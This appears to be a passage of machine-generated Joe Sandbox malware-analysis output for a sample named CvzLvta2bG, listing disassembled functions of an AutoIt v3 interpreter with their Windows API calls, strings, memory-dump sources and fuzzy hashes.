__wcsnicmp.LIBCMT ref: 00E069C1
__wcsnicmp.LIBCMT ref: 00E069D5
__wcsnicmp.LIBCMT ref: 00E06A16
__wcsnicmp.LIBCMT ref: 00E06A2A
__wcsnicmp.LIBCMT ref: 00E06A3E
__wcsnicmp.LIBCMT ref: 00E06A52

Strings

#requireadmin, xrefs: 00E0695B
#include-once, xrefs: 00E0698B
#OnAutoItStartRegister, xrefs: 00E06973
#ce, xrefs: 00E06A4C
#include, xrefs: 00E069A3
#comments-start, xrefs: 00E069BB, 00E06A10
#pragma compile, xrefs: 00E0692B
Unterminated group of comments, xrefs: 00E3E403
Bad directive syntax error, xrefs: 00E3E31A
#notrayicon, xrefs: 00E06943
#cs, xrefs: 00E069CF, 00E06A24
Cannot parse #include, xrefs: 00E3E3F0
#comments-end, xrefs: 00E06A38

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 813496cba4f1809ff5ae88f80f9b6e675c43a640f54aad844185f3f739ed130b
Instruction ID: 6c8426c0385496d4e5863415a60ed2e10edb346c15d1568101ccd29c91b77933
Opcode Fuzzy Hash: 813496cba4f1809ff5ae88f80f9b6e675c43a640f54aad844185f3f739ed130b
Instruction Fuzzy Hash: 7C81F5B1700315BADF20BA60EC46FAF37A8AF15704F047025F905BA1D6EB70DEA5C6A1

Function 00E89A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00E89AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00E89B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 00E89BA7

Strings

0, xrefs: 00E89BE4

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: ad681cdd8b27389019ff1590df87c84161c816dc4819ba4116fc7ca2b78b5e16
Instruction ID: d8d6c7d0602621ebcb51b831b186c3393f4349a2e3811f108f325be006a45262
Opcode Fuzzy Hash: ad681cdd8b27389019ff1590df87c84161c816dc4819ba4116fc7ca2b78b5e16
Instruction Fuzzy Hash: 7502DF31604201AFD729EF25C948BBABBE4FF49308F08552DF59DB62A2D735D844CB51

Function 00E8A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00E8A903
SetTextColor.GDI32(?,?), ref: 00E8A907
GetSysColorBrush.USER32(0000000F), ref: 00E8A91D
GetSysColor.USER32(0000000F), ref: 00E8A928
CreateSolidBrush.GDI32(?), ref: 00E8A92D
GetSysColor.USER32(00000011), ref: 00E8A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E8A953
SelectObject.GDI32(?,00000000), ref: 00E8A964
SetBkColor.GDI32(?,00000000), ref: 00E8A96D
SelectObject.GDI32(?,?), ref: 00E8A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 00E8A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E8A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00E8A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E8A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00E8AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 00E8AA32
DrawFocusRect.USER32(?,?), ref: 00E8AA3D
GetSysColor.USER32(00000011), ref: 00E8AA4B
SetTextColor.GDI32(?,00000000), ref: 00E8AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00E8AA67
SelectObject.GDI32(?,00E8A5FA), ref: 00E8AA7E
DeleteObject.GDI32(?), ref: 00E8AA89
SelectObject.GDI32(?,?), ref: 00E8AA8F
DeleteObject.GDI32(?), ref: 00E8AA94
SetTextColor.GDI32(?,?), ref: 00E8AA9A
SetBkColor.GDI32(?,?), ref: 00E8AAA4

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: b4b79c42125b716f10830d48b60ab24d5c51e1b722f1ed71a59ecce464699e75
Instruction ID: d6f2ca5108f53feb72e7cbdbbf08b989495f61aebca0a7e9695673dc29086d42
Opcode Fuzzy Hash: b4b79c42125b716f10830d48b60ab24d5c51e1b722f1ed71a59ecce464699e75
Instruction Fuzzy Hash: F0515E71901208EFDF109FA5DC48EAE7B79EB48320F154226F919BB2A1D7719944DB90

Function 00E889D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00E88AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E88AD2
CharNextW.USER32(0000014E), ref: 00E88B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00E88B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00E88B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E88B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00E88B86
SetWindowTextW.USER32(?,0000014E), ref: 00E88BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00E88BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 00E88C1F
_memset.LIBCMT ref: 00E88C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00E88C8D
_memset.LIBCMT ref: 00E88CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E88D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 00E88D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 00E88E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 00E88E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E88E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E88EB4
DrawMenuBar.USER32(?), ref: 00E88EC3
SetWindowTextW.USER32(?,0000014E), ref: 00E88EEB

Strings

0, xrefs: 00E88E55

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: ce9e3a51f675fc9f77973b2e744514216267efe46d283476e955f873bf814aa7
Instruction ID: 72b5cac506194946f5df79809882a16f26187f60a82d2c1196c366abfdd6d82b
Opcode Fuzzy Hash: ce9e3a51f675fc9f77973b2e744514216267efe46d283476e955f873bf814aa7
Instruction Fuzzy Hash: 1DE1AF75900218AFDB20AF61CD84EEE7BB9EF04714F50919AFE1DBA190DB709984DF60

Function 00E8488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00E849CA
GetDesktopWindow.USER32 ref: 00E849DF
GetWindowRect.USER32(00000000), ref: 00E849E6
GetWindowLongW.USER32(?,000000F0), ref: 00E84A48
DestroyWindow.USER32(?), ref: 00E84A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E84A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E84ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00E84AE1
SendMessageW.USER32(?,00000421,?,?), ref: 00E84AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00E84B09
IsWindowVisible.USER32(?), ref: 00E84B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00E84B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00E84B58
GetWindowRect.USER32(?,?), ref: 00E84B70
MonitorFromPoint.USER32(?,?,00000002), ref: 00E84B96
GetMonitorInfoW.USER32(00000000,?), ref: 00E84BB0
CopyRect.USER32(?,?), ref: 00E84BC7
SendMessageW.USER32(?,00000412,00000000), ref: 00E84C32

Strings

(, xrefs: 00E84BA3
tooltips_class32, xrefs: 00E84A96
0, xrefs: 00E84975

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: fba16eae812ce2cc4cbbdc7b3c9155c4c459470d3507680dcd74f392ec244e35
Instruction ID: 7247bae26da6d1f600ff94e3b3499b11d8b9b2a44e318f436a8588dd23f87482
Opcode Fuzzy Hash: fba16eae812ce2cc4cbbdc7b3c9155c4c459470d3507680dcd74f392ec244e35
Instruction Fuzzy Hash: D9B17BB1604341AFDB04EF65C844B6ABBE4FF84314F009A1CF59DAB2A2D771E845CB95

Function 00E6449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00E644AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00E644D2
_wcscpy.LIBCMT ref: 00E64500
_wcscmp.LIBCMT ref: 00E6450B
_wcscat.LIBCMT ref: 00E64521
_wcsstr.LIBCMT ref: 00E6452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00E64548
_wcscat.LIBCMT ref: 00E64591
_wcscat.LIBCMT ref: 00E64598
_wcsncpy.LIBCMT ref: 00E645C3

Strings

DefaultLangCodepage, xrefs: 00E645AB
%u.%u.%u.%u, xrefs: 00E64626
04090000, xrefs: 00E6457E
\VarFileInfo\Translation, xrefs: 00E64540
StringFileInfo\, xrefs: 00E6451B

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 811540c07ddab3872998aaa68cc2bff4ca2ed2873b67743bea008cc1797f6c40
Instruction ID: 3f3d85afe2672007a87b7c63c533ac0712aa2523b21ba456f6e2eb8cac35adc9
Opcode Fuzzy Hash: 811540c07ddab3872998aaa68cc2bff4ca2ed2873b67743bea008cc1797f6c40
Instruction Fuzzy Hash: AA41E4719403147BDB14BA74EC43EFF77ECDF41750F00206AFA09B61C2EA359A0196A6

Function 00E027D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E028BC
GetSystemMetrics.USER32(00000007), ref: 00E028C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E028EF
GetSystemMetrics.USER32(00000008), ref: 00E028F7
GetSystemMetrics.USER32(00000004), ref: 00E0291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E02939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E02949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E0297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E02990
GetClientRect.USER32(00000000,000000FF), ref: 00E029AE
GetStockObject.GDI32(00000011), ref: 00E029CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00E029D5

Part of subcall function 00E02344: GetCursorPos.USER32(?), ref: 00E02357
Part of subcall function 00E02344: ScreenToClient.USER32(00EC57B0,?), ref: 00E02374
Part of subcall function 00E02344: GetAsyncKeyState.USER32(00000001), ref: 00E02399
Part of subcall function 00E02344: GetAsyncKeyState.USER32(00000002), ref: 00E023A7

SetTimer.USER32(00000000,00000000,00000028,00E01256), ref: 00E029FC

Strings

AutoIt v3 GUI, xrefs: 00E02974

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 3c4b48829a4b94a822c83864f3a1e67293622da7f4e7b7f0a82f5e5c5cfa0b3b
Instruction ID: 89ed838d1fd8f78d8290c89260d0bc1466d724b705e2fa5d4aa4a039c0c3254f
Opcode Fuzzy Hash: 3c4b48829a4b94a822c83864f3a1e67293622da7f4e7b7f0a82f5e5c5cfa0b3b
Instruction Fuzzy Hash: 41B16C71A0020AEFDB14DFA9DC49BAE7BB4FB48314F105129FA15B62E0DB74E895CB50

Function 00E5A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00E5A47A
__swprintf.LIBCMT ref: 00E5A51B
_wcscmp.LIBCMT ref: 00E5A52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E5A583
_wcscmp.LIBCMT ref: 00E5A5BF
GetClassNameW.USER32(?,?,00000400), ref: 00E5A5F6
GetDlgCtrlID.USER32(?), ref: 00E5A648
GetWindowRect.USER32(?,?), ref: 00E5A67E
GetParent.USER32(?), ref: 00E5A69C
ScreenToClient.USER32(00000000), ref: 00E5A6A3
GetClassNameW.USER32(?,?,00000100), ref: 00E5A71D
_wcscmp.LIBCMT ref: 00E5A731
GetWindowTextW.USER32(?,?,00000400), ref: 00E5A757
_wcscmp.LIBCMT ref: 00E5A76B

Part of subcall function 00E2362C: _iswctype.LIBCMT ref: 00E23634

Strings

%s%u, xrefs: 00E5A515

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 897c0167f8256af14baf29d9e0c6bbee88571c5e94f208b637c3b90a3090a8c7
Instruction ID: e34047eb30d87368814e15adbfb3c1f2a0c414c5b5720e4997ade4d2c8f00faf
Opcode Fuzzy Hash: 897c0167f8256af14baf29d9e0c6bbee88571c5e94f208b637c3b90a3090a8c7
Instruction Fuzzy Hash: 25A1B571204206AFD715DF60C884FAAB7E8FF44355F085A3AFD99E2150DB30E959CB92

Function 00E5AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00E5AF18
_wcscmp.LIBCMT ref: 00E5AF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 00E5AF51
CharUpperBuffW.USER32(?,00000000), ref: 00E5AF6E
_wcscmp.LIBCMT ref: 00E5AF8C
_wcsstr.LIBCMT ref: 00E5AF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00E5AFD5
_wcscmp.LIBCMT ref: 00E5AFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 00E5B00C
GetClassNameW.USER32(00000018,?,00000400), ref: 00E5B055
_wcscmp.LIBCMT ref: 00E5B065
GetClassNameW.USER32(00000010,?,00000400), ref: 00E5B08D
GetWindowRect.USER32(00000004,?), ref: 00E5B0F6

Strings

ThumbnailClass, xrefs: 00E5AFE0, 00E5B060
@, xrefs: 00E5AEF9

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 1a763cf309c917c05ffbded5a52ab9e721191981f9e1568eaafc206e595263aa
Instruction ID: 39292d5d59e0c7a423fbbb5705f7107e5de4689d5a312da827dee2ab516fa679
Opcode Fuzzy Hash: 1a763cf309c917c05ffbded5a52ab9e721191981f9e1568eaafc206e595263aa
Instruction Fuzzy Hash: BC81C2711083059FDB04DF10C981FAA77D8EF84319F18A96AFD89AA091DB34DD8DCBA1

Function 00E8C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623

DragQueryPoint.SHELL32(?,?), ref: 00E8C627

Part of subcall function 00E8AB37: ClientToScreen.USER32(?,?), ref: 00E8AB60
Part of subcall function 00E8AB37: GetWindowRect.USER32(?,?), ref: 00E8ABD6
Part of subcall function 00E8AB37: PtInRect.USER32(?,?,00E8C014), ref: 00E8ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 00E8C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E8C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E8C6BE
_wcscat.LIBCMT ref: 00E8C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E8C705
SendMessageW.USER32(?,000000B0,?,?), ref: 00E8C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 00E8C735
SendMessageW.USER32(?,000000B1,?,?), ref: 00E8C757
DragFinish.SHELL32(?), ref: 00E8C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00E8C851

Strings

pb, xrefs: 00E8C79B
@GUI_DROPID, xrefs: 00E8C77E
@GUI_DRAGID, xrefs: 00E8C7C9
@GUI_DRAGFILE, xrefs: 00E8C800

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb
API String ID: 169749273-730855631
Opcode ID: 76fee54790c7af3b6ec76445b3317471bb9d0a217e5a33bc6a5f90cef8a1f2e4
Instruction ID: eb1086b51f16f652f9881be8af5e38f7aaf4bd145b9a7f8a6750b86cfb09d1b9
Opcode Fuzzy Hash: 76fee54790c7af3b6ec76445b3317471bb9d0a217e5a33bc6a5f90cef8a1f2e4
Instruction Fuzzy Hash: 32618071108300AFC705EF64CC85D9FBBE8EFC9710F50192EF599A21A1DB31A949CB62

Function 00E5ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00E5AC33

Strings

[ACTIVE, xrefs: 00E5AC20
[CLASS:, xrefs: 00E5AC83
ACTIVE, xrefs: 00E5AC0E
[ALL, xrefs: 00E5ACD9
HANDLE=, xrefs: 00E5AC2C
[REGEXPTITLE:, xrefs: 00E5AC5B
REGEXP=, xrefs: 00E5AC48
ALL, xrefs: 00E5ACC7
LAST, xrefs: 00E5ABF8
[HANDLE:, xrefs: 00E5AC3F
CLASSNAME=, xrefs: 00E5AC70
[LAST, xrefs: 00E5ACE0

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 15f04684e5b646dd8f2a6e5c3f6e4253894066d09d4269481223e09c9e3e20bb
Instruction ID: 7366a5ba8a6c4ceacab5cd73ea07a400ed03758c53f684f4fc36823a99e74595
Opcode Fuzzy Hash: 15f04684e5b646dd8f2a6e5c3f6e4253894066d09d4269481223e09c9e3e20bb
Instruction Fuzzy Hash: 2631A471A48309ABDB10FA60DE03EEFB7E4AF10715F643929F881714D1EF616F488A52

Function 00E74FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00E75013
LoadCursorW.USER32(00000000,00007F00), ref: 00E7501E
LoadCursorW.USER32(00000000,00007F03), ref: 00E75029
LoadCursorW.USER32(00000000,00007F8B), ref: 00E75034
LoadCursorW.USER32(00000000,00007F01), ref: 00E7503F
LoadCursorW.USER32(00000000,00007F81), ref: 00E7504A
LoadCursorW.USER32(00000000,00007F88), ref: 00E75055
LoadCursorW.USER32(00000000,00007F80), ref: 00E75060
LoadCursorW.USER32(00000000,00007F86), ref: 00E7506B
LoadCursorW.USER32(00000000,00007F83), ref: 00E75076
LoadCursorW.USER32(00000000,00007F85), ref: 00E75081
LoadCursorW.USER32(00000000,00007F82), ref: 00E7508C
LoadCursorW.USER32(00000000,00007F84), ref: 00E75097
LoadCursorW.USER32(00000000,00007F04), ref: 00E750A2
LoadCursorW.USER32(00000000,00007F02), ref: 00E750AD
LoadCursorW.USER32(00000000,00007F89), ref: 00E750B8
GetCursorInfo.USER32(?), ref: 00E750C8

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 894b64f16ba2c2b6bc770e327e674ff006e08052b88c768ad1a5a20d0b385350
Instruction ID: 4e1ccf5132cdd94056eaee60b240f9ae989e85833c325ef7ccbd0414d956a7f6
Opcode Fuzzy Hash: 894b64f16ba2c2b6bc770e327e674ff006e08052b88c768ad1a5a20d0b385350
